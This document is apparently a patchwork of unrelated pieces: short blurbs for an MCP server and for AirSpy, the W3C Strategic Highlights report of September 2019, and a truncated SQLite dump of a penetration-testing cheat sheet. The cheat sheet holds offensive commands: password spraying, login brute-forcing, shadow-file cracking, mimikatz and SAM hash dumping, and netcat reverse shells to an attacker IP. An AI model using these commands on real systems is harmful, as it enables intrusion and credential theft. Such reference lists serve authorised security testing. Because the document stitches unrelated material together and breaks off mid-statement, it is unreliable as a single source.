An MCP server that acts as a bridge to query multiple OpenAI-compatible LLMs with MCP tool access. Just like rubber duck debugging, explain your problems to various AI "ducks" who can actually research and get different perspectives!

AirSpy - Frida-based tool for exploring and tracking the evolution of Apple's AirDrop protocol implementation on i/macOS, from the server's perspective. Released during BH USA 2019 Training https://www.nowsecure.com/event/advanced-frida-and-radare-a-hackers-delight/

W3C Strategic Highlights September 2019 This report was prepared for the September 2019 W3C Advisory Committee Meeting (W3C Member link). See the accompanying W3C Fact Sheet — September 2019. For the previous edition, see the April 2019 W3C Strategic Highlights. For future editions of this report, please consult the latest version. A Chinese translation is available. ☰ Contents Introduction Future Web Standards Meeting Industry Needs Web Payments Digital Publishing Media and Entertainment Web & Telecommunications Real-Time Communications (WebRTC) Web & Networks Automotive Web of Things Strengthening the Core of the Web HTML CSS Fonts SVG Audio Performance Web Performance WebAssembly Testing Browser Testing and Tools WebPlatform Tests Web of Data Web for All Security, Privacy, Identity Internationalization (i18n) Web Accessibility Outreach to the world W3C Developer Relations W3C Training Translations W3C Liaisons Introduction This report highlights recent work of enhancement of the existing landscape of the Web platform and innovation for the growth and strength of the Web. 33 working groups and a dozen interest groups enable W3C to pursue its mission through the creation of Web standards, guidelines, and supporting materials. We track the tremendous work done across the Consortium through homogeneous work-spaces in Github which enables better monitoring and management. We are in the middle of a period where we are chartering numerous working groups which demonstrate the rapid degree of change for the Web platform: After 4 years, we are nearly ready to publish a Payment Request API Proposed Recommendation and we need to soon charter follow-on work. In the last year we chartered the Web Payment Security Interest Group. In the last year we chartered the Web Media Working Group with 7 specifications for next generation Media support on the Web. We have Accessibility Guidelines under W3C Member review which includes Silver, a new approach. We have just launched the Decentralized Identifier Working Group which has tremendous potential because Decentralized Identifier (DID) is an identifier that is globally unique, resolveable with high availability, and cryptographically verifiable. We have Privacy IG (PING) under W3C Member review which strengthens our focus on the tradeoff between privacy and function. We have a new CSS charter under W3C Member review which maps the group's work for the next three years. In this period, W3C and the WHATWG have succesfully completed the negotiation of a Memorandum of Understanding rooted in the mutual belief that that having two distinct specifications claiming to be normative is generally harmful for the Web community. The MOU, signed last May, describes how the two organizations are to collaborate on the development of a single authoritative version of the HTML and DOM specifications. W3C subsequently rechartered the HTML Working Group to assist the W3C community in raising issues and proposing solutions for the HTML and DOM specifications, and for the production of W3C Recommendations from WHATWG Review Drafts. As the Web evolves continuously, some groups are looking for ways for specifications to do so as well. So-called "evergreen recommendations" or "living standards" aim to track continuous development (and maintenance) of features, on a feature-by-feature basis, while getting review and patent commitments. We see the maturation and further development of an incredible number of new technologies coming to the Web. Continued progress in many areas demonstrates the vitality of the W3C and the Web community, as the rest of the report illustrates. Future Web Standards W3C has a variety of mechanisms for listening to what the community thinks could become good future Web standards. These include discussions with the Membership, discussions with other standards bodies, the activities of thousands of participants in over 300 community groups, and W3C Workshops. There are lots of good ideas. The W3C strategy team has been identifying promising topics and invites public participation. Future, recent and under consideration Workshops include: Inclusive XR (5-6 November 2019, Seattle, WA, USA) to explore existing and future approaches on making Virtual and Augmented Reality experiences more inclusive, including to people with disabilities; W3C Workshop on Data Models for Transportation (12-13 September 2019, Palo Alto, CA, USA) W3C Workshop on Web Games (27-28 June 2019, Redmond, WA, USA), view report Second W3C Workshop on the Web of Things (3-5 June 2019, Munich, Germany) W3C Workshop on Web Standardization for Graph Data; Creating Bridges: RDF, Property Graph and SQL (4-6 March 2019, Berlin, Germany), view report Web & Machine Learning. The Strategy Funnel documents the staff's exploration of potential new work at various phases: Exploration and Investigation, Incubation and Evaluation, and eventually to the chartering of a new standards group. The Funnel view is a GitHub Project where new area are issues represented by “cards” which move through the columns, usually from left to right. Most cards start in Exploration and move towards Chartering, or move out of the funnel. Public input is welcome at any stage but particularly once Incubation has begun. This helps W3C identify work that is sufficiently incubated to warrant standardization, to review the ecosystem around the work and indicate interest in participating in its standardization, and then to draft a charter that reflects an appropriate scope. Ongoing feedback can speed up the overall standardization process. Since the previous highlights document, W3C has chartered a number of groups, and started discussion on many more: Newly Chartered or Rechartered Web Application Security WG (03-Apr) Web Payment Security IG (17-Apr) Patent and Standards IG (24-Apr) Web Applications WG (14-May) Web & Networks IG (16-May) Media WG (23-May) Media and Entertainment IG (06-Jun) HTML WG (06-Jun) Decentralized Identifier WG (05-Sep) Extended Privacy IG (PING) (30-Sep) Verifiable Claims WG (30-Sep) Service Workers WG (31-Dec) Dataset Exchange WG (31-Dec) Web of Things Working Group (31-Dec) Web Audio Working Group (31-Dec) Proposed charters / Advance Notice Accessibility Guidelines WG Privacy IG (PING) RDF Literal Direction WG Timed Text WG CSS WG Web Authentication WG Closed Internationalization Tag Set IG Meeting Industry Needs Web Payments All Web Payments specifications W3C's payments standards enable a streamlined checkout experience, enabling a consistent user experience across the Web with lower front end development costs for merchants. Users can store and reuse information and more quickly and accurately complete online transactions. The Web Payments Working Group has republished Payment Request API as a Candidate Recommendation, aiming to publish a Proposed Recommendation in the Fall 2019, and is discussing use cases and features for Payment Request after publication of the 1.0 Recommendation. Browser vendors have been finalizing implementation of features added in the past year (view the implementation report). As work continues on the Payment Handler API and its implementation (currently in Chrome and Edge Canary), one focus in 2019 is to increase adoption in other browsers. Recently, Mastercard demonstrated the use of Payment Request API to carry out EMVCo's Secure Remote Commerce (SRC) protocol whose payment method definition is being developed with active participation by Visa, Mastercard, American Express, and Discover. Payment method availability is a key factor in merchant considerations about adopting Payment Request API. The ability to get uniform adoption of a new payment method such as Secure Remote Commerce (SRC) also depends on the availability of the Payment Handler API in browsers, or of proprietary alternatives. Web Monetization, which the Web Payments Working Group will discuss again at its face-to-face meeting in September, can be used to enable micropayments as an alternative revenue stream to advertising. Since the beginning of 2019, Amazon, Brave Software, JCB, Certus Cybersecurity Solutions and Netflix have joined the Web Payments Working Group. In April, W3C launched the Web Payment Security Group to enable W3C, EMVCo, and the FIDO Alliance to collaborate on a vision for Web payment security and interoperability. Participants will define areas of collaboration and identify gaps between existing technical specifications in order to increase compatibility among different technologies, such as: How do SRC, FIDO, and Payment Request relate? The Payment Services Directive 2 (PSD2) regulations in Europe are scheduled to take effect in September 2019. What is the role of EMVCo, W3C, and FIDO technologies, and what is the current state of readiness for the deadline? How can we improve privacy on the Web at the same time as we meet industry requirements regarding user identity? Digital Publishing All Digital Publishing specifications, Publication milestones The Web is the universal publishing platform. Publishing is increasingly impacted by the Web, and the Web increasingly impacts Publishing. Topic of particular interest to Publishing@W3C include typography and layout, accessibility, usability, portability, distribution, archiving, offline access, print on demand, and reliable cross referencing. And the diverse publishing community represented in the groups consist of the traditional "trade" publishers, ebook reading system manufacturers, but also publishers of audio book, scholarly journals or educational materials, library scientists or browser developers. The Publishing Working Group currently concentrates on Audiobooks which lack a comprehensive standard, thus incurring extra costs and time to publish in this booming market. Active development is ongoing on the future standard: Publication Manifest Audiobook profile for Web Publications Lightweight Packaging Format The BD Comics Manga Community Group, the Synchronized Multimedia for Publications Community Group, the Publishing Community Group and a future group on archival, are companions to the working group where specific work is developed and incubated. The Publishing Community Group is a recently launched incubation channel for Publishing@W3C. The goal of the group is to propose, document, and prototype features broadly related to: publications on the Web reading modes and systems and the user experience of publications The EPUB 3 Community Group has successfully completed the revision of EPUB 3.2. The Publishing Business Group fosters ongoing participation by members of the publishing industry and the overall ecosystem in the development of Web infrastructure to better support the needs of the industry. The Business Group serves as an additional conduit to the Publishing Working Group and several Community Groups for feedback between the publishing ecosystem and W3C. The Publishing BG has played a vital role in fostering and advancing the adoption and continued development of EPUB 3. In particular the BG provided critical support to the update of EPUBCheck to validate EPUB content to the new EPUB 3.2 specification. This resulted in the development, in conjunction with the EPUB3 Community Group, of a new generation of EPUBCheck, i.e., EPUBCheck 4.2 production-ready release. Media and Entertainment All Media specifications The Media and Entertainment vertical tracks media-related topics and features that create immersive experiences for end users. HTML5 brought standard audio and video elements to the Web. Standardization activities since then have aimed at turning the Web into a professional platform fully suitable for the delivery of media content and associated materials, enabling missing features to stream video content on the Web such as adaptive streaming and content protection. Together with Microsoft, Comcast, Netflix and Google, W3C received an Technology & Engineering Emmy Award in April 2019 for standardization of a full TV experience on the Web. Current goals are to: Reinforce core media technologies: Creation of the Media Working Group, to develop media-related specifications incubated in the WICG (e.g. Media Capabilities, Picture-in-picture, Media Session) and maintain maintain/evolve Media Source Extensions (MSE) and Encrypted Media Extensions (EME). Improve support for Media Timed Events: data cues incubation. Enhance color support (HDR, wide gamut), in scope of the CSS WG and in the Color on the Web CG. Reduce fragmentation: Continue annual releases of a common and testable baseline media devices, in scope of the Web Media APIs CG and in collaboration with the CTA WAVE Project. Maintain the Road-map of Media Technologies for the Web which highlights Web technologies that can be used to build media applications and services, as well as known gaps to enable additional use cases. Create the future: Discuss perspectives for Media and Entertainment for the Web. Bring the power of GPUs to the Web (graphics, machine learning, heavy processing), under incubation in the GPU for the Web CG. Transition to a Working Group is under discussion. Determine next steps after the successful W3C Workshop on Web Games of June 2019. View the report. Timed Text The Timed Text Working Group develops and maintains formats used for the representation of text synchronized with other timed media, like audio and video, and notably works on TTML, profiles of TTML, and WebVTT. Recent progress includes: A robust WebVTT implementation report poises the specification for publication as a proposed recommendation. Discussions around re-chartering, notably to add a TTML Profile for Audio Description deliverable to the scope of the group, and clarify that rendering of captions within XR content is also in scope. Immersive Web Hardware that enables Virtual Reality (VR) and Augmented Reality (AR) applications are now broadly available to consumers, offering an immersive computing platform with both new opportunities and challenges. The ability to interact directly with immersive hardware is critical to ensuring that the web is well equipped to operate as a first-class citizen in this environment. The Immersive Web Working Group has been stabilizing the WebXR Device API while the companion Immersive Web Community Group incubates the next series of features identified as key for the future of the Immersive Web. W3C plans a workshop focused on the needs and benefits at the intersection of VR & Accessibility (Inclusive XR), on 5-6 November 2019 in Seattle, WA, USA, to explore existing and future approaches on making Virtual and Augmented Reality experiences more inclusive. Web & Telecommunications The Web is the Open Platform for Mobile. Telecommunication service providers and network equipment providers have long been critical actors in the deployment of Web technologies. As the Web platform matures, it brings richer and richer capabilities to extend existing services to new users and devices, and propose new and innovative services. Real-Time Communications (WebRTC) All Real-Time Communications specifications WebRTC has reshaped the whole communication landscape by making any connected device a potential communication end-point, bringing audio and video communications anywhere, on any network, vastly expanding the ability of operators to reach their customers. WebRTC serves as the corner-stone of many online communication and collaboration services. The WebRTC Working Group aims to bringing WebRTC 1.0 (and companion specification Media Capture and Streams) to Recommendation by the end of 2019. Intense efforts are focused on testing (supported by a dedicated hackathon at IETF 104) and interoperability. The group is considering pushing features that have not gotten enough traction to separate modules or to a later minor revision of the spec. Beyond WebRTC 1.0, the WebRTC Working Group will focus its efforts on WebRTC NV which the group has started documenting by identifying use cases. Web & Networks Recently launched, in the wake of the May 2018 Web5G workshop, the Web & Networks Interest Group is chaired by representatives from AT&T, China Mobile and Intel, with a goal to explore solutions for web applications to achieve better performance and resource allocation, both on the device and network. The group's first efforts are around use cases, privacy & security requirements and liaisons. Automotive All Automotive specifications To create a rich application ecosystem for vehicles and other devices allowed to connect to the vehicle, the W3C Automotive Working Group is delivering a service specification to expose all common vehicle signals (engine temperature, fuel/charge level, range, tire pressure, speed, etc.) The Vehicle Information Service Specification (VISS), which is a Candidate Recommendation, is seeing more implementations across the industry. It provides the access method to a common data model for all the vehicle signals –presently encapsulating a thousand or so different data elements– and will be growing to accommodate the advances in automotive such as autonomous and driver assist technologies and electrification. The group is already working on a successor to VISS, leveraging the underlying data model and the VIWI submission from Volkswagen, for a more robust means of accessing vehicle signals information and the same paradigm for other automotive needs including location-based services, media, notifications and caching content. The Automotive and Web Platform Business Group acts as an incubator for prospective standards work. One of its task forces is using W3C VISS in performing data sampling and off-boarding the information to the cloud. Access to the wealth of information that W3C's auto signals standard exposes is of interest to regulators, urban planners, insurance companies, auto manufacturers, fleet managers and owners, service providers and others. In addition to components needed for data sampling and edge computing, capturing user and owner consent, information collection methods and handling of data are in scope. The upcoming W3C Workshop on Data Models for Transportation (September 2019) is expected to focus on the need of additional ontologies around transportation space. Web of Things All Web of Things specifications W3C's Web of Things work is designed to bridge disparate technology stacks to allow devices to work together and achieve scale, thus enabling the potential of the Internet of Things by eliminating fragmentation and fostering interoperability. Thing descriptions expressed in JSON-LD cover the behavior, interaction affordances, data schema, security configuration, and protocol bindings. The Web of Things complements existing IoT ecosystems to reduce the cost and risk for suppliers and consumers of applications that create value by combining multiple devices and information services. There are many sectors that will benefit, e.g. smart homes, smart cities, smart industry, smart agriculture, smart healthcare and many more. The Web of Things Working Group is finishing the initial Web of Things standards, with support from the Web of Things Interest Group: Web of Things Architecture Thing Descriptions Strengthening the Core of the Web HTML The HTML Working Group was chartered early June to assist the W3C community in raising issues and proposing solutions for the HTML and DOM specifications, and to produce W3C Recommendations from WHATWG Review Drafts. A few days before, W3C and the WHATWG signed a Memorandum of Understanding outlining the agreement to collaborate on the development of a single version of the HTML and DOM specifications. Issues and proposed solutions for HTML and DOM done via the newly rechartered HTML Working Group in the WHATWG repositories The HTML Working Group is targetting November 2019 to bring HTML and DOM to Candidate Recommendations. CSS All CSS specifications CSS is a critical part of the Open Web Platform. The CSS Working Group gathers requirements from two large groups of CSS users: the publishing industry and application developers. Within W3C, those groups are exemplified by the Publishing groups and the Web Platform Working Group. The former requires things like better pagination support and advanced font handling, the latter needs intelligent (and fast!) scrolling and animations. What we know as CSS is actually a collection of almost a hundred specifications, referred to as ‘modules’. The current state of CSS is defined by a snapshot, updated once a year. The group also publishes an index defining every term defined by CSS specifications. Fonts All Fonts specifications The Web Fonts Working Group develops specifications that allow the interoperable deployment of downloadable fonts on the Web, with a focus on Progressive Font Enrichment as well as maintenance of WOFF Recommendations. Recent and ongoing work includes: Early API experiments by Adobe and Monotype have demonstrated the feasibility of a font enrichment API, where a server delivers a font with minimal glyph repertoire and the client can query the full repertoire and request additional subsets on-the-fly. In other experiments, the Brotli compression used in WOFF 2 was extended to support shared dictionaries and patch update. Metrics to quantify improvement are a current hot discussion topic. The group will meet at ATypi 2019 in Japan, to gather requirements from the international typography community. The group will first produce a report summarizing the strengths and weaknesses of each prototype solution by Q2 2020. SVG All SVG specifications SVG is an important and widely-used part of the Open Web Platform. The SVG Working Group focuses on aligning the SVG 2.0 specification with browser implementations, having split the specification into a currently-implemented 2.0 and a forward-looking 2.1. Current activity is on stabilization, increased integration with the Open Web Platform, and test coverage analysis. The Working Group was rechartered in March 2019. A new work item concerns native (non-Web-browser) uses of SVG as a non-interactive, vector graphics format. Audio The Web Audio Working Group was extended to finish its work on the Web Audio API, expecting to publish it as a Recommendation by year end. The specification enables synthesizing audio in the browser. Audio operations are performed with audio nodes, which are linked together to form a modular audio routing graph. Multiple sources — with different types of channel layout — are supported. This modular design provides the flexibility to create complex audio functions with dynamic effects. The first version of Web Audio API is now feature complete and is implemented in all modern browsers. Work has started on the next version, and new features are being incubated in the Audio Community Group. Performance Web Performance All Web Performance specifications There are currently 18 specifications in development in the Web Performance Working Group aiming to provide methods to observe and improve aspects of application performance of user agent features and APIs. The W3C team is looking at related work incubated in the W3C GPU for the Web (WebGPU) Community Group which is poised to transition to a W3C Working Group. A preliminary draft charter is available. WebAssembly All WebAssembly specifications WebAssembly improves Web performance and power by being a virtual machine and execution environment enabling loaded pages to run native (compiled) code. It is deployed in Firefox, Edge, Safari and Chrome. The specification will soon reach Candidate Recommendation. WebAssembly enables near-native performance, optimized load time, and perhaps most importantly, a compilation target for existing code bases. While it has a small number of native types, much of the performance increase relative to Javascript derives from its use of consistent typing. WebAssembly leverages decades of optimization for compiled languages and the byte code is optimized for compactness and streaming (the web page starts executing while the rest of the code downloads). Network and API access all occurs through accompanying Javascript libraries -- the security model is identical to that of Javascript. Requirements gathering and language development occur in the Community Group while the Working Group manages test development, community review and progression of specifications on the Recommendation Track. Testing Browser testing plays a critical role in the growth of the Web by: Improving the reliability of Web technology definitions; Improving the quality of implementations of these technologies by helping vendors to detect bugs in their products; Improving the data available to Web developers on known bugs and deficiencies of Web technologies by publishing results of these tests. Browser Testing and Tools The Browser Testing and Tools Working Group is developing WebDriver version 2, having published last year the W3C Recommendation of WebDriver. WebDriver acts as a remote control interface that enables introspection and control of user agents, provides a platform- and language-neutral wire protocol as a way for out-of-process programs to remotely instruct the behavior of Web, and emulates the actions of a real person using the browser. WebPlatform Tests The WebPlatform Tests project now provides a mechanism which allows to fully automate tests that previously needed to be run manually: TestDriver. TestDriver enables sending trusted key and mouse events, sending complex series of trusted pointer and key interactions for things like in-content drag-and-drop or pinch zoom, and even file upload. Since 2014 W3C began work on this coordinated open-source effort to build a cross-browser test suite for the Web Platform, which WHATWG, and all major browsers adopted. Web of Data All Data specifications There have been several great success stories around the standardization of data on the web over the past year. Verifiable Claims seems to have significant uptake. It is also significant that the Distributed Identifier WG charter has received numerous favorable reviews, and was just recently launched. JSON-LD has been a major success with the large deployment on Web sites via schema.org. JSON-LD 1.1 completed technical work, about to transition to CR More than 25% of websites today include schema.org data in JSON-LD The Web of Things description is in CR since May, making use of JSON-LD Verifiable Credentials data model is in CR since July, also making use of JSON-LD Continued strong interest in decentralized identifiers Engagement from the TAG with reframing core documents, such as Ethical Web Principles, to include data on the web within their scope Data is increasingly important for all organizations, especially with the rise of IoT and Big Data. W3C has a mature and extensive suite of standards relating to data that were developed over two decades of experience, with plans for further work on making it easier for developers to work with graph data and knowledge graphs. Linked Data is about the use of URIs as names for things, the ability to dereference these URIs to get further information and to include links to other data. There are ever-increasing sources of open Linked Data on the Web, as well as data services that are restricted to the suppliers and consumers of those services. The digital transformation of industry is seeking to exploit advanced digital technologies. This will facilitate businesses to integrate horizontally along the supply and value chains, and vertically from the factory floor to the office floor. W3C is seeking to make it easier to support enterprise-wide data management and governance, reflecting the strategic importance of data to modern businesses. Traditional approaches to data have focused on tabular databases (SQL/RDBMS), Comma Separated Value (CSV) files, and data embedded in PDF documents and spreadsheets. We're now in midst of a major shift to graph data with nodes and labeled directed links between them. Graph data is: Faster than using SQL and associated JOIN operations More favorable to integrating data from heterogeneous sources Better suited to situations where the data model is evolving In the wake of the recent W3C Workshop on Graph Data we are in the process of launching a Graph Standardization Business Group to provide a business perspective with use cases and requirements, to coordinate technical standards work and liaisons with external organizations. Web for All Security, Privacy, Identity All Security specifications, all Privacy specifications Authentication on the Web As the WebAuthn Level 1 W3C Recommendation published last March is seeing wide implementation and adoption of strong cryptographic authentication, work is proceeding on Level 2. The open standard Web API gives native authentication technology built into native platforms, browsers, operating systems (including mobile) and hardware, offering protection against hacking, credential theft, phishing attacks, thus aiming to end the era of passwords as a security construct. You may read more in our March press release. Privacy An increasing number of W3C specifications are benefitting from Privacy and Security review; there are security and privacy aspects to every specification. Early review is essential. Working with the TAG, the Privacy Interest Group has updated the Self-Review Questionnaire: Security and Privacy. Other recent work of the group includes public blogging further to the exploration of anti-patterns in standards and permission prompts. Security The Web Application Security Working Group adopted Feature Policy, aiming to allow developers to selectively enable, disable, or modify the behavior of some of these browser features and APIs within their application; and Fetch Metadata, aiming to provide servers with enough information to make a priori decisions about whether or not to service a request based on the way it was made, and the context in which it will be used. The Web Payment Security Interest Group, launched last April, convenes members from W3C, EMVCo, and the FIDO Alliance to discuss cooperative work to enhance the security and interoperability of Web payments (read more about payments). Internationalization (i18n) All Internationalization specifications, educational articles related to Internationalization, spec developers checklist Only a quarter or so current Web users use English online and that proportion will continue to decrease as the Web reaches more and more communities of limited English proficiency. If the Web is to live up to the "World Wide" portion of its name, and for the Web to truly work for stakeholders all around the world engaging with content in various languages, it must support the needs of worldwide users as they engage with content in the various languages. The growth of epublishing also brings requirements for new features and improved typography on the Web. It is important to ensure the needs of local communities are captured. The W3C Internationalization Initiative was set up to increase in-house resources dedicated to accelerating progress in making the World Wide Web "worldwide" by gathering user requirements, supporting developers, and education & outreach. For an overview of current projects see the i18n radar. W3C's Internationalization efforts progressed on a number of fronts recently: Requirements: New African and European language groups will work on the gap analysis, errata and layout requirements. Gap analysis: Japanese, Devanagari, Bengali, Tamil, Lao, Khmer, Javanese, and Ethiopic updated in the gap-analysis documents. Layout requirements document: notable progress tracked in the Southeast Asian Task Force while work continues on Chinese layout requirements. Developer support: Spec reviews: the i18n WG continues active review of specifications of the WHATWG and other W3C Working Groups. Short review checklist: easy way to begin a self-review to help spec developers understand what aspects of their spec are likely to need attention for internationalization, and points them to more detailed checklists for the relevant topics. It also helps those reviewing specs for i18n issues. Strings on the Web: Language and Direction Metadata lays out issues and discusses potential solutions for passing information about language and direction with strings in JSON or other data formats. The document was rewritten for clarity, and expanded. The group is collaborating with the JSON-LD and Web Publishing groups to develop a plan for updating RDF, JSON-LD and related specifications to handle metadata for base direction of text (bidi). User-friendly test format: a new format was developed for Internationalization Test Suite tests, which displays helpful information about how the test works. This particularly useful because those tests are pointed to by educational materials and gap-analysis documents. Web Platform Tests: a large number of tests in the i18n test suite have been ported to the WPT repository, including: css-counter-styles, css-ruby, css-syntax, css-test, css-text-decor, css-writing-modes, and css-pseudo. Education & outreach: (for all educational materials, see the HTML & CSS Authoring Techniques) Web Accessibility All Accessibility specifications, WAI resources The Web Accessibility Initiative supports W3C's Web for All mission. Recent achievements include: Education and training: Inaccessibility of CAPTCHA updated to bring our analysis and recommendations up to date with CAPTCHA practice today, concluding two years of extensive work and invaluable input from the public (read more on the W3C Blog Learn why your web content and applications should be accessible. The Education and Outreach Working Group has completed revision and updating of the Business Case for Digital Accessibility. Accessibility guidelines: The Accessibility Guidelines Working Group has continued to update WCAG Techniques and Understanding WCAG 2.1; and published a Candidate Recommendation of Accessibility Conformance Testing Rules Format 1.0 to improve inter-rater reliability when evaluating conformance of web content to WCAG An updated charter is being developed to host work on "Silver", the next generation accessibility guidelines (WCAG 2.2) There are accessibility aspects to most specifications. Check your work with the FAST checklist. Outreach to the world W3C Developer Relations To foster the excellent feedback loop between Web Standards development and Web developers, and to grow participation from that diverse community, recent W3C Developer Relations activities include: @w3cdevs tracks the enormous amount of work happening across W3C W3C Track during the Web Conference 2019 in San Francisco Tech videos: W3C published the 2019 Web Games Workshop videos The 16 September 2019 Developer Meetup in Fukuoka, Japan, is open to all and will combine a set of technical demos prepared by W3C groups, and a series of talks on a selected set of W3C technologies and projects W3C is involved with Mozilla, Google, Samsung, Microsoft and Bocoup in the organization of ViewSource 2019 in Amsterdam (read more on the W3C Blog) W3C Training In partnership with EdX, W3C's MOOC training program, W3Cx offers a complete "Front-End Web Developer" (FEWD) professional certificate program that consists of a suite of five courses on the foundational languages that power the Web: HTML5, CSS and JavaScript. We count nearly 900K students from all over the world. Translations Many Web users rely on translations of documents developed at W3C whose official language is English. W3C is extremely grateful to the continuous efforts of its community in ensuring our various deliverables in general, and in our specifications in particular, are made available in other languages, for free, ensuring their exposure to a much more diverse set of readers. Last Spring we developed a more robust system, a new listing of translations of W3C specifications and updated the instructions on how to contribute to our translation efforts. W3C Liaisons Liaisons and coordination with numerous organizations and Standards Development Organizations (SDOs) is crucial for W3C to: make sure standards are interoperable coordinate our respective agenda in Internet governance: W3C participates in ICANN, GIPO, IGF, the I* organizations (ICANN, IETF, ISOC, IAB). ensure at the government liaison level that our standards work is officially recognized when important to our membership so that products based on them (often done by our members) are part of procurement orders. W3C has ARO/PAS status with ISO. W3C participates in the EU MSP and Rolling Plan on Standardization ensure the global set of Web and Internet standards form a compatible stack of technologies, at the technical and policy level (patent regime, fragmentation, use in policy making) promote Standards adoption equally by the industry, the public sector, and the public at large Coralie Mercier, Editor, W3C Marketing & Communications $Id: Overview.html,v 1.60 2019/10/15 12:05:52 coralie Exp $ Copyright © 2019 W3C ® (MIT, ERCIM, Keio, Beihang) Usage policies apply.

-- -- File generated with SQLiteStudio v3.2.1 on Sun Feb 7 14:58:28 2021 -- -- Text encoding used: System -- PRAGMA foreign_keys = off; BEGIN TRANSACTION; -- Table: Commands CREATE TABLE Commands (Command_No INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL, Name TEXT REFERENCES Programs (Name) NOT NULL, Description TEXT NOT NULL, Command TEXT, File BLOB); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (1, 'Kerbrute', 'brute single user password', 'kerbrute bruteuers [flags]', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (2, 'Kerbrute', 'brute username:password combos from file or stdin', 'kerbrute brutforce [flags]', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (3, 'Kerbrute', 'test a single password agains a list of users', 'kerbrute passwordspray [flags]', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (4, 'Kerbrute', 'Enumerate valid domain usernames via kerberos', 'kerbrute userenum [flags]', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (5, 'Name-That-Hash', 'Find the hash type of a string', 'nth --text ''<hash>''', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (6, 'Name-That-Hash', 'Find the hash type of a file', 'nth --file <hash file>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (7, 'Nmap', 'scan for vulnerabilites', 'nmap --script vuln <HOST_IP>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (8, 'Nikto', 'Scan host for vulnerabilites', 'nikto -h <HOST_IP>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (9, 'SMBClient', 'check for misconfigured anonymous login', 'smbclient -L \\\\<HOST_IP>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (10, 'Hydra', 'Brutforce a webpage looking for usernames', 'hydra -l <user wordlist> -p 123 <HOST_IP> http-post-form ''/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:F=<output string on failure>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (11, 'SMBMap', 'enumerates SMB file shares', 'smbmap -u <user> -p <pass> -H <host IP>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (12, 'WPScan', 'Enumerate Wordpress website', 'wpscan --url <wp site> --enumerate --plugins-detection', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (13, 'WPScan', 'enumerate though known usernames', 'wpscan --url <HOST_IP> --usernames <USERNAME_FOUND> --passwords wordlist.dic', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (14, 'PowerShell', 'bypass execution policy', 'powershell.exe -exec bypass', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (15, 'TheHarvester', 'gathering informaiton from online sources', 'theharvester -d <domain> -l <#> -g -b google', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (16, 'Netcat', 'open a listener', 'nc -lvnp <port #>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (17, 'Netcat', 'Connect to computer', 'nc <attacker ip> <attacker port>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (18, 'GoBuster', 'Eunmerate directories on a website with a cookie', 'gobuster dir -u http://<IP> -w <wordlist> -x <extention> -c PHPSESSID=<cookie val>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (19, 'SQLMap', 'map sql at an IP', 'sqlmap -r <IP> --batch --force-ssl', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (20, 'John the Ripper', 'Use wordlist to parse hash', 'john <HASHES_FILE> --wordlist=<wordlist>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (21, 'John the Ripper', 'unencrypt shadow file', 'john <Unshadowed passwds>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (22, 'Unshadow', 'combine /etc/passwd and /etc/shadow file for cracking', 'unshadow <passwd> <shadow>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (23, 'Hashcat', 'crack hashes with a wordlist', 'hashcat -m <hash type> -a 0 -o <output file> <hash file> <wordlist> --force', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (26, 'Enum4Linux', 'basic command', 'enum4linux -a <IP>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (27, 'SMBClient', 'connect to a SMB share', 'smbclinet //<IP>/<share> -U <username>', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (28, 'Netcat', 'connect with shell (-e doest always work)', 'nc -e /bin/sh <ATTACKING-IP> 80', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (29, 'Netcat', 'connect with shell (-e doest always work)', '/bin/sh | nc ATTACKING-IP 80', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (30, 'Netcat', 'done on the target', 'rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0/tmp/p', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (31, 'SQLMap', 'Check form for SQL injection', 'sqlmap -o -u "http://meh.com/form/" –forms', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (32, 'SQLMap', 'automated SQL scan', 'sqlmap -u <URL> --forms --batch --crawl=10 --cookie=jsessionid=54321 --level=5 --risk=3', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (33, 'CrackMapExec', 'run a mimikatz module', 'crackmapexec smb <target(s)> -u <username> -p <password> --local-auth -M mimikatz', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (34, 'CrackMapExec', 'Command execution', 'crackmapexec smb <target(s)> -u ''<username>'' -p ''<password>'' -x whoami', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (35, 'CrackMapExec', 'check logged in users', 'crackmapexec smb <target(s)> -u ''<username>'' -p ''<password>'' --lusers', NULL); INSERT INTO Commands (Command_No, Name, Description, Command, File) VALUES (36, 'CrackMapExec', 'dump local SAM hashes', 'crackmapexec <target(s)> -u ''<uesrname>'' -p ''<password>'' --local-auth --sam', 